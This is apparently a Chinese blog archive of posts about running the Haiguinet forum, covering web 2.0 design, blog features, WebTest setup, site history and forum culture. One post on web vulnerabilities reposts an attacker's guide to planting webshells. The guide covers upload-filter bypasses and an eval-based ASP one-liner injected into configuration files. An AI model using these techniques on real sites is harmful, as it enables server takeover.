谈谈 web 2.0 网站页面设计的共性,以及海龟网可借鉴改进的地方。 当然,现在海龟网的最大问题还不在于界面,而是稳定性/鲁棒性、速度、性能可扩展性(scalability)等,以及一些最迫切的功能的实现。所以龟网技术力量目前的重点不在于此。 Web 2.0 界面设计共性 强调内容,强调互动的web 2.0 时代,网页设计师们不约而同采取了一些设计原则。。。通观现在典型的web 2.0网站,可以总结出web 2.0网站页面设计的共有特性如下: (1) 简单即是美。 这是一个重要原则。 页面不靠花里胡哨的图形而是靠内容吸引人。复杂的界面设计逐渐回归于简单, 让访客专注于网站内容而不是被网站的界面分散了注意力 应该让人感觉网站不错很牛B,而不是让人感觉网站的设计师很牛B。 (2) 页面布局: ----越来越多的网站采用1-2 列 (1-column or 2-column) 的设计, 决不能超过3列。 而在一两年前,3-4 column的网站还大行其道--这世界变化真快哈 --- 页面居中排版 (center aligned) 页面内容居于中间,而不是靠左、右; 页面宽度固定, 而不是占满整个浏览器。 大家想想,你觉得界面不错的网站是不是大多数这样子? --- 有足够的空白来分隔不同区域 在这之前的web design, 比较讲究”第一屏“的重要性,也就是不用滚动或翻页就能提供给用户尽量多的信息,这也是为什么许多网站在小小的地方密密麻麻地堆砌了一大堆的东西—这样的布局容易让用户觉得疲惫,眼花缭乱头晕眼花。。。 今天由于滚动轮鼠标的普及,上下滚动对于大多数用户来说已经非常方便不再是浏览的障碍,因此越来越多的网站敢于使用简单的布局而让内容从上往下走. (3) 大的字体 使用较大的字体,让浏览者的眼睛舒服。 使用比一般内容大很多的字体来显示需要突出注意的内容。 (4) 鲜艳而有强烈对比的色彩 明亮强烈的色彩是许多web 2.0网站的另一个共性。。。用对比强烈的色彩来分隔不同区域,或者突出重要的内容。 蓝色、橙色等被大量使用,但最为代表性的是一种柠檬绿--号称web 2.0的代表色。 当然颜色不能到处滥用。。。例如,背景色一般需要柔软中性的色彩。 [...]
Browsing Posts tagged 海归网
主要是海归网博客首页改版,并且增加了许多博客功能。 现在刚刚推出,还有许多地方需要进一步完善和优化,如速度问题等。 欢迎各位报告bug并提出意见与建议。 海龟博客的首页是: http://www.haiguinet.com/blog/ 或 http://blog.haiguinet.com 新功能、改进包括: 1. 首页上的各种统计排行– 1.1 博客文章点击数统计 1.2 最高点击量用户统计 1。3 用户发文统计 1。4 评论数统计 2。用户推荐博客功能: 增加“推荐博客”功能,用户浏览博客文章时可以点击按钮“推荐这个博客”;每周被推荐票数最高的文章在博客首页“网友推荐榜“ 3。站方预设的固定分类 预设一些固定分类,所有用户都可以把文章放到这些分类里。这些分类就是在首页下半部分显示的那些分类; 4。首页增加“博客导读”部分, 由管理员选择的精华文章在该部分显示 5。博客的用户profile与论坛统一, --也就是说论坛里设置的那些年龄性别msn地址等应该在博客里也看得见。每个人的博客首页应可以显示这些profile. — 打开每个人的博客页,显示一个头像和简单个人信息, 博客用户的图像直接采用他在论坛里的头像。没有在论坛设头像则用缺省的。 6. 用户自己的博客增加一些统计: 是否在自己的博客上显示“最新文章”, “热门文章”, “最新评论”等。 用户可以在管理后台选择是否需要显示这些东西。 -- 如果选择了,而且这个用户选择的主题支持这些功能,那么用户自己的博客首页显示这些东西。 -- 如果用户的当前主题不支持,那么忽略。 7. keywords (tags)功能 增加一个博客的tagging功能, 用户发表文章时可以指定任意关键词。 在首页“热门关键词”板块显示热门tag cloud.
查看一个帖子时下面会列出最多10条相关的帖子. 初步推出, 相关帖子准确度还需提高–我们会继续做tuning和改进. 现在是基于对帖子标题进行中文分词基础上的全文检索. 以后等龟坛Tagging功能做好后改用帖子的关键字来匹配准确度会大得多. 欢迎大家提出意见和建议.
如果对code (SQL/php etc) injection, file inclusion, cross site scripting 不熟悉可google相关文章。 防止这类漏洞的最重要一点在于对用户输入作过滤。例如,对于防止xss可参照归坛的function.php里的removexss() 函数。 关于这类漏洞的危害,这里有篇文章是关于对一些常见网站加入木马shell的,有兴趣可一读. 转篇华夏的从后台拿到webshell(转自 donews: http://blog.donews.com/swap/archive/2006/05/31/895681.aspx ) 前 言 动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。 注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。 一、直接上传获得webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网 5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。 二、添加修改上传类型 现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型, bbsxp后台可以添加asa|asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell 了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。 LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格! 三、利用后台管理功能写入webshell 上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有 leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\网站incIncHtmBoardLink.asp就是我们想要的shell。 四、利用后台管理向配置文件写webshell 利用"""":""//"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net":eval request(chr(35))//",还有一种方法就是写上 cnhacker at 263 dot net"%><%eval [...]
每次运行之前需要在数据库里populate需要的测试数据,这个可以用SQL ant task自动在test case里实现--相关test case第一步就是作数据初始化。 步骤: (1) 建议先写好SQL script,把这些sql文件放在单独的SQL目录里。(optional) (2) 把 mysql jdbc driver 文件 “mysql-connector-java-5.0.4-bin.jar”拷贝到 webtest的lib目录下,并且加入到java classpath (或者 webtest.sh /webtest.bat 的calsspath里) 哪里找文件 mysql-connector-java-5.0.4-bin.jar呢? --先从这里下载mysql-connector-java-5.0.4.zip : http://dev.mysql.com/get/Downloads/Connector-J/mysql-connector-java-5.0.4.zip/from/http://mirror.services.wisc.edu/mysql/ ,解压后你会看到mysql-connector-java-5.0.4-bin.jar. (3)写SQL task: 一个简单的SQL ant task是这样的: <sql driver="com.mysql.jdbc.Driver" url="jdbc:mysql://host:port/database" userid="sa" password="pass" src="data.sql" /> 意思是链接到位于 host:port的mysql数据库里的"database" schema, 用sa/pass登陆,然后运行 "data.sql"文件。 或者这样直接写sql语句: <sql driver="com.mysql.jdbc.Driver" url="jdbc:mysql://host:port/database" userid="sa" password="pass" ><![CDATA[ update some_table set [...]
这是我们实现Agile development重要的一环. (0) 安装 – download jave runtime (JRE) – download webtest: http://webtest.canoo.com/webtest/build.zip, 解压到本地目录 <WEBTEST_HOME> (例如, C:\webtest) – Add <WEBTEST_HOME>\bin to your PATH (控制面板–>系统–>高级–>环境变量) –cd <WEB_HOME>\doc\samples 运行: webtest -buildfile installTest.xml 一般来说,运行test cases用这样的语法: webtest -buildfile <testcasefile> 例如, webtest -buildfile mytest.xml (1)test cases目录结构 建立一个目录叫testcases,testcases放到该目录下面 testcases includes: 包含文件 properties: 存储一些与环境相关或常变化的测试数据 modules:小的可重用的测试模块 UseCases : 对应于use cases的test cases TestResults: 存放测试结果和报告. [...]
按:希望对不熟悉海归论坛的朋友了解海归网的历史和现在有所帮助。试图从一个普通网友的角度客观描述海归网的一切。 此文资料大多通过本人记忆和论坛搜索功能”考古“而来,错漏难免; 另外虽然尽量客观但是总不可避免有主观成分 — 大家发现任何不当/不实/疏漏之处请跟帖提出或直接到wikipedia修改”海归网“项目: http://zh.wikipedia.org/wiki/%E6%B5%B7%E5%BD%92%E7%BD%91 如果wikipedia项目能被接受此帖将会定期从Wikipedia更新。(注:因防火墙缘故国内网友无法访问wikipedia); 欢迎大家一起参与编写海归网的历史! 目录 1 海归网大事记 2 常用词解释: 3 网友昵称对照表: 4 公开马甲或新旧马甲对照表 海归网大事记 2003年1月:海归论坛开坛, 发布<a rel="nofollow" ti<x>tle="http://www.haiguinet.com/bbs/viewtopic.php?p=33624" class="external text" href="viewtopic.php?p=33624">海归宣言;当时只有一个论坛--海归论坛, 斑竹是狼协。 图片: 最早版本的海归网首页; 2003年2月左右,增加专题分类功能。 2003年2月-3月:一些著名ID如安普若,找北,无痕,言轻,hwarrensen, valley, ee,红薯等相继加入海归网注册发言, 这些ID中的大部分至今仍活跃在论坛上。 2003年4月,安普若发表小说【回国记】第一集”启程回国“,文中主人公以第一人称”我“叙事。【回国记】是后来的【回国训火记】的前身。 2003年7月: 海归论坛语音聊天室开张 2003年8月,北京”吃吃喝喝俱乐部“yahoo group开张,由”女人在北京“(后更名”京姐“)主持, 组织了许多北京地区归国人员的联谊活动。 2003年8,9月左右:”主贴顺序版“,”跟贴顺序版“,”主板无跟贴“等。 2003年九月,海龟网的流量猛涨。开始有关筹建海归黄埔的讨论; 2003年10月 海归黄埔军校创业讨论达到高潮, 并讨论关于黄埔俱乐部的筹建;各小组开始运作; 积极参与讨论并付诸行动的ID包括安普若,本乡,hithere, CHU,大友,dongbeilaoge,inforum, startupper,lanlan等。征集海归网新logo, 找北设计的红日风帆标志被选为海归网的新logo. 2003年11月 应一些女网友要求,海龟网开辟新坛”花木兰营区“;后来这批女网友自称”木兰会“. 同时开辟新坛”留守专区“和”闲聊专区“。 2003年11月-12月:上海吃吃喝喝俱乐部成立。首任主席是”永远的衡“。 2003年12月,由完颜鸿烈网友赞助设立的海归相册开张,吸引许多网友将自己的真实相片上传。12月底举行网上语音party, 许多网友表演唱,说等. 2004年1月,发生"阿Q事件”,安普若第二次潜水。同月海归论坛技术人员亚瑟等人与狼协发生分歧,双方争执的结果是海归网服务器被拿下线,海 [...]
趁开始忙之前集中灌几天水,东拉西扯想到哪说到哪 论坛里的生态角色 (纯粹一边喝白水一边瞎想出来的,请勿对号入座) 网上论坛虽然是虚拟社区,也是一个小社会,也有人间百态,每个人在里面轮番扮演不同的角色。 一篇帖子发出去,有叫好的,有拍砖的,有扯到其他话题上去的,当然还有只看贴不发言的沉默的大多数。 这帖子也是分原创和转贴。原创的作者这里通称写手或者大虾。 写手是论坛兴旺的根本--一个论坛要有一定数量的高质量原创写手才会吸引人来,这一点估计没有人反对。可是从长久来说,不能把希望寄托在个别大虾身上,不然大虾一走立马玩完。 注意我这里说的是“个别”而不是说写手这一群体: 在免费论坛上业余玩票性质的写作方式无法保证哪一个大虾哪天突然不来了--可能生活发生了变化,可能兴趣转移,可能热情的起伏,可能…you never know. 网络不是生活的全部,尤其在网络上写作不能带来任何经济效益的情况下。另外高手到一定水平,发表到传统平面媒体很可能带来更多的满足感和回报, 虽然这个情况正在逐渐改变。 需要一个不断壮大的写手群体。要保证这点,需要论坛有一个良性互动的气氛,有自己吸引人的论坛文化。做到这点需要靠论坛的设计、制度和管理员、斑竹的引导。不过这个是说起来容易做得好难。 论坛程序方面,速度要快,人性化设计,尽可能让用户参与管理, web 2.0 … 跟贴中捧场的和拍砖的同样很重要。前者让主贴作者得到鼓励,后者往往能展开讨论。写帖子的不怕拍砖,就怕没人回帖没有交流,发个帖子就像肉包子打狗有去无回。流行的的各种“看贴不回贴”搞笑图片就说明了这点。 除了上面的这些,一个论坛里一般还有这几类人: --把bbs当chatroom版聊的(树形版面较适于此,即所谓“搭楼梯”) --转贴专家 --到处找人战斗的斗士 --斑竹、管理员 --问题求助的 --回答问题的 --纯灌水的 --沉默的大多数 当然每个人来说这些角色一般都不是固定的,大多数人有时这样有时那样,但确实有不少人在大多数时间扮演其中某一两个固定的角色。 斗士中的理性辩论者是论坛繁荣所需要的;另一类满嘴喷粪以骂人为乐的则是论坛的大敌,一经发现坛方必须马上喀嚓--这种人人数即使很少但破坏力非常巨大,不加控制论坛会变成粪坑。当年文学成的一些论坛就是被这样毁掉的。 关于帖子点击率: 哥们经常是费了老鼻子劲好不容易折腾出个原创帖子发出去,可是反响却令人失望--点击数不多,回帖寥寥, 上论坛的热情一下子受到了打击。 看看热门的帖子,首先得是大家感兴趣得话题– 男女关系是永远得热点, 在归坛上则还要加上海归经验,到底归不归,offer如何, 办公室政治策略等。帖子的标题也要好,即使不搞不惊人誓不休也得吸引人。当然内容质量是关键,不然哗众取宠次数多了你的信用就打了折扣,再牛的标题也没人进来。 文章的长度要适中,太长大家没时间看敬而远之,太短很难有什么料。 关于国外的论坛的印象 除了极少数的,我个人很少去固定的国外论坛,通常都是去找答案的技术型论坛;比如碰到什么技术问题去google一下,答案往往在相关的support论坛里。又比如我想买HIFI功放,我会去avs之类的论坛去做research,看别人对各种brand/model的反馈。这些论坛大都是一些Q&A性质的,有人问问题,有人解答。而一般这类论坛都会有一些大牛解答大多数newbie的问题。 象中文论坛这样百花齐放内容包罗万象的综合型论坛似乎不多,大都只限于某个专业或方向。 我固定常去的论坛只有slashdot;几年以前还常去salon.com,现在已经没时间了。Slashdot不是严格意义上的论坛,而是一个blog/news/forum的混合体。用户提交帖子,管理员决定是否接受发布出来。虽然我去主要是关注技术新闻和走势,但从每天上千的帖子里还是可以看出美国人(至少是那帮自称为geek/nerds的家伙)的想法: 这是一帮“左派”–凡是有关知识产权/DRM/RIAA/MPAA的帖子就会立马被贴上来然后对好莱坞痛批,凡是linux/free software/open source的事情都被贴上来讨论个没完。。。 在我感兴趣的关于中国的话题上,帖子们更是一个定式: -- wired 或 cnet news.com报道了有关中国的消息,例如中国防火墙,google屏蔽搜索,政府要求网吧使用者用身份证等等 -- 立马有人贴到slashdot -- 如果是关于internet, [...]
海龟网 与web 2.0 海归论坛设计的主导思想是内容和用户的便利始终在最重要的位置,虽然由于资源的限制目前还有许多不尽人意的地方,例如界面不整齐美观,一些功能使用不太方便或者不直观等等,但是这些都是一直在努力完善的。在这不断 改进的过程中也借鉴吸收不少web 2.0的思想和相关功能, 但决不是赶时髦为了web 2.0而web 2.0, 而是为了为用户提供更好的服务。 除了现在已有的功能,我们计划的改进(所谓”改版第二阶段“,)中下列的跟web 2.0 相关: – 提高用户参与程度 理想情况是 everything is editable by users, end users are able to control the data they created; 好处在于: 大家对论坛/网站管理有更大参与,对内容更有决定权; 网站管理人员的负担可以减轻。 网站管理更加民主,减少由于网友与网站管理人员个人口味不同导致的纠纷,以及潜在错误。 具体来说,我们的计划(有些已经在做, 有些还只是计划)包括: (1)由用户评分选精华和糟粕 除了现有斑竹推荐的导读之外,超过预定积分值的用户也可以对帖子进行评分(1-5, 或者简单地送鲜花还是臭鸡蛋)。一个帖子有超过预定数目的不同网友进行评分,并且分数达到精华值则自动被标记为用户推荐精华,并且在首页显示。反之,若帖子得分低于垃圾铁上限,则被自动送入公开的垃圾版。 这与Digg的做法有点类似。无痕也提过这方面的建议。 (2) 擂台区 这个是固若GinTonic大虾的建议,我们觉得很好;做法与用户评分类似,只是目的稍微不一样:用户评选将发生口舌战斗的帖子送进擂台区。 详细可见贴: http://www.haiguinet.com/bbs/viewtopic.php?p=975868 (3) 文章分类 现在的论坛是自上而下的”专题"(taxonomy); 但是问题是许多文章不一定属于我们预定义的专题。一个自然的想法是借鉴folksonomy,由用户输入 帖子相关的关键词。但是单纯由作者标记的关键词表也有问题,一是不一定准确, 二是同一个意思有太多同义词造成关键词太多; 一个办法 是类似”Collabulary“的办法,即关键词由多个用户产生--除了文章作者,其他有权限的用户也可以标记帖子的关键词。 这跟wiki有点类似:一个作者可能解释某个词语不够准确,但是与其他作者的合力作用下总的来说趋于权威的答案。 [...]
表格形 (flat view) VS 树形 (threaded view, tree view) 树形和表格形各有其优缺点: (1) 树形易于形成一个讨论的气氛。 (2) 与表格形比较,从点击量来说树形会使帖子的点击量看起来少许多,原因是树形统计点击量是单个帖子的点击量,而表格形是整个主题(主帖及其所有跟帖的点击数, 因为跟帖的点击数是无法统计的)。 举个例子,在树形下看这个帖子:http://www.haiguinet.com/bbs/viewtopic.php?p=969231 的点击数是8236; 如果切换成表格形,那么该主题的点击数则为37139. 所以如果你在天涯等论坛上看到一个点击数为上万的主题,其实际点击数不一定比海归网上一个点击几千的主帖多。 (3) 树形结构在跟帖不多的时候比较清晰,对讨论一目了然。就象看各人的对话一样。这是绝大多数人喜欢的树形显示的优点,但从另一个角度来说也是缺点:许多人干脆只看跟帖标题知道一个大概,而根本不点击阅读帖子本身。还有许多人回帖不看帖。 (4) 表格形不易搞清跟帖的关系:跟帖多了,搞不清是在跟谁的帖。 (5) 树形更适于就一个问题深入讨论:两大原因: –前面的缺点,跟帖搞不清跟谁的,那实际上就主要是跟前一个的或者主题的。而树形的跟帖则经常叉开引出其他讨论,越说越离题。偶的观察是只要深度超过4的跟帖的内容跟主题基本无关。 — 一旦有根贴总要被顶上来的,这样一个话题可以不断的连载更新和深入讨论下去; 举个例子,同样是连载小说,吴越或250、安校长的每集出来都是都是一个单独的主贴,每次点击率几百上千,根贴几个到几十个;如果上下集间隔时间较长,上一集就被冲到不知哪里去了。而在表格形式的论坛如新郎搜狐天涯,一篇小说的所有连载都是在同一个主题里的,每当有人参加讨论或者作者出了一集新的,该主题又被顶上来,累计起来的根贴和点击数就可以想象了。 (6) 树形结构一般跟帖数量少,而表格形结构跟帖数目多。除了龟坛外,1海外最大的中文论坛文学城,以及万维等都是这样。原因跟前面一条的基本相同。另外树形跟帖如果太多按现在一般的论坛程序也没法handle: 想象一个5000跟帖的主题按现在龟坛的树形结构展开时的样子,更不要说对论坛系统的负担。 那么解决办法是什么?结合树形和表格形的优点, 表格中有树,树中有限制。海归网的改进计划中就包含这点。 该洗洗睡了,下回聊聊BBS 的生态组织, 国内外论坛的特点和异同。
